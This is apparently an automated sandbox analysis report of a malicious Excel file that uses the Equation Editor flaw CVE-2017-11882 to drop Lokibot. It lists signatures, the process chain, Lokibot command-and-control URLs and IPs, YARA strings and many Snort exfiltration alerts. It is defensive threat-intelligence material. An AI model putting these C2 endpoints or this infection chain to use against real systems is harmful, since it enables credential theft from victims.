Windows Analysis Report Original shipping documents.xlsx

Overview

General Information

Sample Name: Original shipping documents.xlsx
Analysis ID: 491904
MD5: 27eb25e6fbbbd37115055ecc4b557c53
SHA1: 4c986607a941900d9d8804aa351dcab0cc4de224
SHA256: 09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab
Tags: xlsx

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2688 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1484 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1268 cmdline: 'C:\Users\Public\vbc.exe' MD5: 59A67B5CCF01B6A564265797DC5E53E8)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://checkvim.com/ga14/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row)

00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row)

4.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
4.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
4.2.vbc.exe.400000.1.raw.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
4.2.vbc.exe.400000.1.raw.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.155.83.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1484, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1484, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1484, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1268
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1484, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1268

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://checkvim.com/ga14/fre.php"]}
Antivirus detection for URL or domain
Source: http://checkvim.com/ga14/fre.php | Avira URL Cloud: Label: malware

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe | Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: 5}NC:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
Source: Binary string: C:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: global traffic | DNS query: name: checkvim.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 103.155.83.184:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49166 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49166 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49167 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49167 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 5.188.89.50:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49168
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49203
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49204
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49205
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49206
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49207
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49208
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49209
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49210
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49211
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49212
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49213
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49214
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49215
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49216
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49217
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49218
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49219
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49220
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49221
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49222
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49223
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49224
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49225
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49226
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49227
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49228
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49229
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49230
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 5.188.89.50:80
